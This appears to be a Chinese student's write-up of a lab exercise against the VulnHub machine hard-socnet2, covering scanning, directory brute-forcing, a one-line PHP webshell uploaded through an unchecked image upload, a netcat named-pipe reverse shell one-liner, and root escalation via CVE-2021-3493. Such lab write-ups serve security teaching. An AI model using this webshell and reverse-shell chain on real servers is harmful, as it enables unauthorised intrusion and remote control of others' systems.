网络攻防实战 lab06 靶机 VulnHub hard-socnet2

地址发现

arp-scan -l

image

得到地址为 10.0.2.8

端口发现与服务版本探测

nmap -p- 10.0.2.8
nmap -p22,80,8000 -sC -sV 10.0.2.8

目录爆破

dirb http://10.0.2.8:80 /usr/share/dirb/wordlists/big.txt

image

得到若干个目录:

  • data,有一个文件夹 images,里面 post 文件夹存放所有照片,profile 文件夹存放用户头像
  • database,两个文件 DML.sql 和 DDL.sql,分别是用户信息的格式,以及几个基本用户信息
  • functions,两个文件 function.php 和 upload.php,第二个应该就是上传的代码
  • includes,有若干个 php 代码
  • images,一个网站 logo 图片
  • resources,一个 js 文件夹,里面两个 js 代码,一个 css 文件夹,里面一个 css 代码

访问 80 端口

注册账号进入后,发布一个 post,发现 profile 中有可以上传图片的地方。

3

于是尝试上传一句话 PHP 木马:

<?php eval($_POST['cmd']); ?>

上传后发现并没有什么检查。直接右键打开发现位于 http://10.0.2.8/data/images/posts/,于是用蚁剑执行这个 php。

然后用蚁剑连接就获得了一个反弹 shell:

4

从蚁剑终端的反弹 shell 到本地终端的反弹 shell

执行

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.2.15 4444 >/tmp/f

在本地用 nc 监听 4444 端口得到后,再在本地执行,以获得一个跟本地终端一样的反弹 shell

python -c 'import pty; pty.spawn("/bin/bash")'

执行后,按 Ctrl+Z 将当前会话挂起,在本地终端执行:

stty raw -echo; fg

使用内核漏洞

在本地执行

uname -a
lsb_release -a

知道发行版为 Ubuntu 18.04

查找资料得到 CVE-2021-3493 漏洞。

使用 http 传输 exploit.c 到靶机上,然后执行这个爆破代码即可提权。

image

posted @ 2025-11-13 20:46  哼唧昂叽  阅读(5)  评论(0)    收藏  举报